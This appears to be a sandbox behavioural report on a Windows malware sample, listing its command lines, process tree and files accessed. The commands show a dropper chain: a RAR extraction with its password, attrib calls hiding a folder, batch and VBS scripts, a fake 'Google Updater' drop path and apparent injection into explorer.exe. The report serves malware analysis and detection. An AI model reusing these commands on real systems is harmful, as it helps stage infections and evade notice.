C:\Users\ADMINI~1\AppData\Local\Temp\3a1m9iqmu7mwag_1.exe /suac
C:\Windows\SysWOW64\explorer.exe
"C:\Users\ADMINI~1\AppData\Local\Temp\k77saes3u.exe"
"C:\Windows\system32\SearchFilterHost.exe" 0 520 524 532 65536 528
attrib +s +h "C:\LMPupdate\set"
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-1118702447-2625566189-3437391212-5001_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-1118702447-2625566189-3437391212-5001 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"
"unpakedree.exe" e -p67dah9fasdd8kja8ds9h9sad 43939237cx.rar
timeout 5
timeout 0
C:\LMPupdate\set\unpakedree.exe
cmd /c ""C:\LMPupdate\set\183.bat" "
timeout 6
"C:\Windows\System32\WScript.exe" "C:\LMPupdate\set\3980392CV.vbs"
timeout 2
xc829374091FD.exe /start
taskkill /f /im unpakedree.exe
attrib -s -h "C:\LMPupdate\set\xc829374091FD.exe"
cmd /c ""C:\LMPupdate\set\48551.bat" "
timeout 4
Process Tree
(PIDs are specific to this sandbox run. Of note: xc829374091FD.exe (PID 2320 → 3168) is the parent of C:\Windows\SysWOW64\explorer.exe (PID 2128), and that explorer.exe node is the one loading wininet.dll and touching the cached C2 responses (Content.IE5\...\logout[1].php) and the Google Updater 2.09 drop path. A 32-bit explorer.exe started by a non-system parent and performing outbound HTTP is consistent with code injection into explorer.exe — this is not proven by the listing, but the parent/child relationship itself is a usable detection.)
2792
Image Path
"C:/Malware/86aab09b278fe8e538d8cecd28f2d7a32fe413724d5ee52e2815a3267a988595.exe"
Files Accessed
C:\LMPupdate\set
C:\LMPupdate
C:\Users\ADMINI~1\AppData\Local\Temp\AITMP515\AUninstall.ini
Process Children
3172
Image Path
"C:\Windows\System32\WScript.exe" "C:\LMPupdate\set\435246.vbs"
Files Accessed
C:\Windows\SysWOW64\cmd.exe
Process Children
3208
Image Path
cmd /c ""C:\LMPupdate\set\183.bat" "
Files Accessed
C:\Windows\winsxs\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
C:\Windows\SysWOW64\sfc_os.dll
C:\Windows\SysWOW64\sfc.dll
C:\LMPupdate\set\43939237cx.rar
Process Children
3236
Image Path
timeout 0
Files Accessed
C:\LMPupdate\set
C:\Windows
Process Children
3268
Image Path
C:\LMPupdate\set\unpakedree.exe
Files Accessed
C:\Users\Administrator
C:\Users
C:\Users\desktop.ini
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Windows\SysWOW64\ntmarta.dll
C:\Windows\SysWOW64\propsys.dll
C:\Windows\Registration\R000000000006.clb
C:\
C:\Windows\WindowsShell.Manifest
C:\LMPupdate\set
C:\Users\Administrator\Desktop\desktop.ini
C:\Users\Administrator\AppData
3252
Image Path
ping dhgfg sgudy
Files Accessed
C:\Windows\SysWOW64\rasadhlp.dll
C:\Windows\SysWOW64\dnsapi.dll
C:\Windows\SysWOW64\wship6.dll
C:\Windows\SysWOW64\WSHTCPIP.DLL
C:\Windows\SysWOW64\mswsock.dll
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\SysWOW64\en-US\ping.exe.mui
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\winnsi.dll
3224
Image Path
"unpakedree.exe" e -p67dah9fasdd8kja8ds9h9sad 43939237cx.rar
Files Accessed
C:\Windows\SysWOW64\propsys.dll
C:\Windows\Registration\R000000000006.clb
C:\
C:\Windows\WindowsShell.Manifest
C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
C:\Windows\SysWOW64\shell32.dll
C:\Windows\SysWOW64\uxtheme.dll
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\SysWOW64\api-ms-win-core-synch-l1-2-0.dll
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\rsaenh.dll
C:\Windows\SysWOW64\cryptsp.dll
C:\LMPupdate\set
C:\Windows\SysWOW64\crypt32.dll
C:\Users\Administrator\Desktop\desktop.ini
C:\Users\Administrator\AppData
C:\Users\Administrator
C:\Users
C:\Users\desktop.ini
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Windows\SysWOW64\ntmarta.dll
C:\LMPupdate\set\43939237cx.rar
C:\LMPupdate\set\48551.bat
C:\LMPupdate\set\xc829374091FD.exe
C:\LMPupdate\set\3980392CV.vbs
3104
Image Path
timeout 5
Files Accessed
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\version.dll
C:\Windows\SysWOW64\sechost.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\System32\wow64.dll
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\SysWOW64\en-US\timeout.exe.mui
4000
Image Path
"C:\Windows\System32\WScript.exe" "C:\LMPupdate\set\3980392CV.vbs"
Files Accessed
C:\Windows\SysWOW64\cmd.exe
Process Children
4080
Image Path
cmd /c ""C:\LMPupdate\set\48551.bat" "
Files Accessed
C:\LMPupdate\set\435246.vbs
C:\LMPupdate\set\unpakedree.exe
C:\LMPupdate\set\3980392CV.vbs
Process Children
2768
Image Path
attrib +s +h "C:\LMPupdate\set"
Files Accessed
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
C:\Windows\WindowsShell.Manifest
C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll
C:\Windows\System32\shell32.dll
C:\Windows\System32\NlsLexicons0009.dll
C:\Windows\System32\NlsData0009.dll
C:\Windows\System32\NaturalLanguage6.dll
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010008.ci
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010008.wid
C:\Users\Public\Desktop\desktop.ini
C:\Users\Public
C:\Users\Public\Documents\desktop.ini
C:\Users\Public\desktop.ini
C:\Users\desktop.ini
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010007.wsb
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.002
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010008.dir
C:\Users\Administrator\AppData\LocalLow
C:\Users\Administrator\AppData\LocalLow\Sun
C:\Users\Administrator\AppData\LocalLow\Sun\Java
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
C:\Windows\Microsoft.NET
C:\Windows\Microsoft.NET\Framework
C:\Windows\Microsoft.NET\Framework64
C:\Users\Administrator\AppData\Local\Microsoft\Windows\WER
C:\ProgramData\Microsoft\RAC
C:\Windows\SysWOW64\ulib.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\System32\wow64.dll
C:\LMPupdate\set
C:\LMPupdate
C:\
C:\Windows\SysWOW64\en-US\attrib.exe.mui
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\sechost.dll
Process Children
1348
Image Path
"C:\Windows\system32\SearchFilterHost.exe" 0 520 524 532 65536 528
Files Accessed
C:\Windows\System32\mssprxy.dll
C:\Windows\System32\RpcRtRemote.dll
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\System32\rsaenh.dll
C:\Windows\System32\cryptsp.dll
C:\Windows\Registration\R000000000006.clb
C:\Windows\System32\cryptbase.dll
C:\Windows\System32\rpcss.dll
1768
Image Path
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-1118702447-2625566189-3437391212-5001_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-1118702447-2625566189-3437391212-5001 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"
Files Accessed
C:\Windows\System32\mapi32.dll
C:\Windows\System32\mssvp.dll
C:\Windows\System32\mssprxy.dll
C:\Windows\System32\RpcRtRemote.dll
C:\Windows\System32\rsaenh.dll
C:\Windows\System32\cryptsp.dll
C:\Windows\System32\profapi.dll
C:\Windows\System32\userenv.dll
C:\Windows\System32\cscobj.dll
C:\Windows\System32\cscapi.dll
2820
Image Path
timeout 2
Files Accessed
C:\Windows\SysWOW64\version.dll
C:\Windows\SysWOW64\sechost.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\System32\wow64.dll
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\SysWOW64\en-US\timeout.exe.mui
C:\Windows\SysWOW64\imm32.dll
2320
Image Path
xc829374091FD.exe /start
Files Accessed
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\sechost.dll
Process Children
3168
Image Path
xc829374091FD.exe /start
Process Children
2128
Image Path
C:\Windows\SysWOW64\explorer.exe
Files Accessed
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VBB46FVT\logout[1].php
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZQNBZ6B0\logout[1].php
C:\Windows\SysWOW64\ole32.dll
C:\Windows\SysWOW64\en-US\msctf.dll.mui
C:\Windows\SysWOW64\srvcli.dll
C:\Windows\SysWOW64\netutils.dll
C:\Windows\SysWOW64\netapi32.dll
C:\Windows\SysWOW64\dnsapi.dll
C:\Windows\SysWOW64\version.dll
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64
C:\Windows
C:\
C:\Windows\AppPatch\sysmain.sdb
C:\Windows\SysWOW64\apphelp.dll
C:\Windows\SysWOW64\propsys.dll
C:\Windows\SysWOW64\secur32.dll
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\SysWOW64\slc.dll
C:\Windows\SysWOW64\dwmapi.dll
C:\Windows\SysWOW64\powrprof.dll
C:\Windows\SysWOW64\uxtheme.dll
C:\Windows\SysWOW64\dui70.dll
C:\Windows\SysWOW64\duser.dll
C:\Windows\SysWOW64\ExplorerFrame.dll
C:\Windows\Fonts\StaticCache.dat
C:\Windows\WindowsShell.Manifest
C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\ntdll.dll
C:\Windows\SysWOW64\samlib.dll
C:\Windows\SysWOW64\profapi.dll
C:\Windows\SysWOW64\ntmarta.dll
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\SysWOW64\sfc_os.dll
C:\Windows\SysWOW64\samcli.dll
C:\Windows\SysWOW64\wkscli.dll
C:\ProgramData\Google Updater 2.09
C:\ProgramData\Google Updater 2.09\3a1m9iqmu7mwag.exe
C:\ProgramData
C:\Windows\SysWOW64\wininet.dll
C:\Windows\SysWOW64\winrnr.dll
C:\Windows\SysWOW64\pnrpnsp.dll
C:\Windows\SysWOW64\NapiNSP.dll
C:\Windows\SysWOW64\nlaapi.dll
C:\Windows\SysWOW64\WSHTCPIP.DLL
C:\Windows\SysWOW64\wship6.dll
C:\Windows\SysWOW64\rasadhlp.dll
C:\Windows\SysWOW64\FWPUCLNT.DLL
C:\Windows\SysWOW64\winnsi.dll
C:\Windows\SysWOW64\IPHLPAPI.DLL
C:\Windows\SysWOW64\mswsock.dll
C:\Users\Administrator\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
C:\Users\Administrator\AppData\Local\Microsoft\Windows\History\History.IE5
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
C:\Users\Administrator\AppData\LocalLow\Sun\Java\Deployment\deployment.properties
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0NQY21LG\logout[1].php
C:\Windows\SysWOW64\SensApi.dll
C:\Windows\SysWOW64\ras
C:\Windows\SysWOW64\rtutils.dll
C:\Windows\SysWOW64\rasman.dll
C:\Windows\SysWOW64\rasapi32.dll
C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1118702447-2625566189-3437391212-500\a18ca4003deb042bbee7a40f15e1970b_d29292bc-6ac1-4095-a280-5613a9b5e8f4
C:\Windows\SysWOW64\userenv.dll
C:\Windows\SysWOW64\rsaenh.dll
Process Children
3676
Image Path
C:\Users\ADMINI~1\AppData\Local\Temp\3a1m9iqmu7mwag_1.exe /suac
Files Accessed
C:\Windows\SysWOW64\imm32.dll
C:\Users\ADMINI~1\AppData\Local
C:\Users\ADMINI~1\AppData
C:\Users\ADMINI~1
C:\Users
C:\
C:\Windows\AppPatch\sysmain.sdb
C:\Windows\SysWOW64\apphelp.dll
C:\Windows\SysWOW64\sechost.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\System32\wow64.dll
C:\Users\ADMINI~1\AppData\Local\Temp\3a1m9iqmu7mwag_1.exe
3552
Image Path
"C:\Users\ADMINI~1\AppData\Local\Temp\k77saes3u.exe"
Files Accessed
C:\Windows\Microsoft.NET\Framework64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319
C:\Windows\System32\sechost.dll
C:\Users\ADMINI~1\AppData\Local
C:\Users\ADMINI~1\AppData
C:\Users\ADMINI~1
C:\Users
C:\
C:\Windows\AppPatch\AppPatch64\sysmain.sdb
C:\Windows\System32\apphelp.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config
C:\Windows\System32\msvcr110_clr0400.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
C:\Users\ADMINI~1\AppData\Local\Temp\k77saes3u.exe
C:\Windows\System32\imm32.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\9da5bb33cd1c34b7851c088f0cf749cc\mscorlib.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\9da5bb33cd1c34b7851c088f0cf749cc\mscorlib.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\713a8c0e41e664d349efcc0cec7f5e86\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\713a8c0e41e664d349efcc0cec7f5e86\System.Core.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core
C:\Windows\assembly\NativeImages_v4.0.30319_64\System\e3305bdbd03ef919051aa7f2783ac32a\System.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System\e3305bdbd03ef919051aa7f2783ac32a\System.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System
C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\d18710ed5e7f97e18f73837505dbb041\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#
C:\Windows\System32\uxtheme.dll
C:\Windows\System32\cryptbase.dll
C:\Windows\System32\rpcss.dll
C:\Users\ADMINI~1\AppData\Local\Temp
C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\comctl32.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\57d58592aa974e9d0ccd4546e981c295\System.Windows.Forms.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\acc5b07beef536f26da664ecfc145083\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\acc5b07beef536f26da664ecfc145083\System.Drawing.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\57d58592aa974e9d0ccd4546e981c295\System.Windows.Forms.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\d18710ed5e7f97e18f73837505dbb041\Microsoft.VisualBasic.ni.dll
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt73a1fc9d#\96cbfd6eef291b11a5d04028360f6081\System.Runtime.Remoting.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt73a1fc9d#\96cbfd6eef291b11a5d04028360f6081\System.Runtime.Remoting.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt73a1fc9d#
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\sortdefault.nlp
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\nlssorting.dll
C:\Windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\GdiPlus.dll
C:\Windows\System32\tzres.dll
C:\Windows\Fonts\msjh.ttf
C:\Windows\Fonts\tahoma.ttf
C:\Users\Administrator\AppData\Local\GDIPFONTCACHEV1.DAT
C:\Windows\Fonts\segoeui.ttf
C:\Windows\Fonts\micross.ttf
C:\Windows\Fonts\malgun.ttf
C:\Windows\Fonts\msyh.ttf
C:\Windows\Fonts\StaticCache.dat
C:\Windows\Fonts\verdana.ttf
C:\Windows\Fonts\segoeuiz.ttf
C:\Windows\Fonts\segoeuii.ttf
C:\Windows\Fonts\segoeuib.ttf
C:\Windows\Fonts\verdanaz.ttf
C:\Windows\Fonts\verdanai.ttf
C:\Windows\Fonts\verdanab.ttf
C:\Windows\System32\WindowsCodecs.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
C:\Windows\System32\RpcRtRemote.dll
C:\Windows\System32\rsaenh.dll
C:\Windows\System32\cryptsp.dll
C:\Windows\Fonts\arialbd.ttf
C:\Windows\Fonts\arialbi.ttf
C:\Windows\Fonts\ariali.ttf
C:\Windows\Fonts\arial.ttf
C:\Windows\WindowsShell.Manifest
C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll
C:\Windows\System32\en-US\msctf.dll.mui
C:\Windows\System32\dwmapi.dll
2552
Image Path
taskkill /f /im unpakedree.exe
Files Accessed
C:\Windows\SysWOW64\secur32.dll
C:\Windows\SysWOW64\mpr.dll
C:\Windows\SysWOW64\version.dll
C:\Windows\SysWOW64\sechost.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\System32\wow64.dll
C:\Windows\SysWOW64\en-US\taskkill.exe.mui
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\dbghelp.dll
C:\Windows\SysWOW64\wkscli.dll
C:\Windows\SysWOW64\srvcli.dll
C:\Windows\SysWOW64\netutils.dll
C:\Windows\SysWOW64\netapi32.dll
C:\Windows\SysWOW64\wtsapi32.dll
C:\Windows\SysWOW64\framedynos.dll
C:\Windows\SysWOW64\ntdsapi.dll
C:\Windows\SysWOW64\wbem\fastprox.dll
C:\Windows\SysWOW64\wbem\wbemsvc.dll
C:\Windows\SysWOW64\RpcRtRemote.dll
C:\Windows\SysWOW64\rsaenh.dll
C:\Windows\SysWOW64\cryptsp.dll
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\SysWOW64\winsta.dll
C:\Windows\SysWOW64\wbemcomn.dll
C:\Windows\SysWOW64\wbem\wbemprox.dll
C:\Windows\Registration\R000000000006.clb
C:\Windows\SysWOW64\en-US\KernelBase.dll.mui
2796
Image Path
taskkill /f /im unpakedree.exe
Files Accessed
C:\Windows\SysWOW64\rsaenh.dll
C:\Windows\SysWOW64\cryptsp.dll
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\SysWOW64\winsta.dll
C:\Windows\SysWOW64\wbemcomn.dll
C:\Windows\SysWOW64\wbem\wbemprox.dll
C:\Windows\Registration\R000000000006.clb
C:\Windows\SysWOW64\en-US\KernelBase.dll.mui
C:\Windows\SysWOW64\en-US\taskkill.exe.mui
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\dbghelp.dll
C:\Windows\SysWOW64\wkscli.dll
C:\Windows\SysWOW64\srvcli.dll
C:\Windows\SysWOW64\netutils.dll
C:\Windows\SysWOW64\netapi32.dll
C:\Windows\SysWOW64\wtsapi32.dll
C:\Windows\SysWOW64\framedynos.dll
C:\Windows\SysWOW64\secur32.dll
C:\Windows\SysWOW64\mpr.dll
C:\Windows\SysWOW64\version.dll
C:\Windows\SysWOW64\sechost.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\System32\wow64.dll
C:\Windows\SysWOW64\ntdsapi.dll
C:\Windows\SysWOW64\wbem\fastprox.dll
C:\Windows\SysWOW64\wbem\wbemsvc.dll
C:\Windows\SysWOW64\RpcRtRemote.dll
2824
Image Path
attrib -s -h "C:\LMPupdate\set\xc829374091FD.exe"
Files Accessed
C:\LMPupdate\set\xc829374091FD.exe
C:\LMPupdate\set
C:\LMPupdate
C:\Windows\SysWOW64\en-US\attrib.exe.mui
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\sechost.dll
C:\Windows\SysWOW64\ulib.dll
2292
Image Path
timeout 4
Files Accessed
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\SysWOW64\en-US\timeout.exe.mui
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\version.dll
C:\Windows\SysWOW64\sechost.dll
C:\Windows\System32\wow64cpu.dll
4008
Image Path
timeout 6
Files Accessed
C:\Windows\SysWOW64\en-US\timeout.exe.mui
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\version.dll
C:\Windows\SysWOW64\sechost.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\System32\wow64.dll
C:\Windows\Globalization\Sorting\SortDefault.nls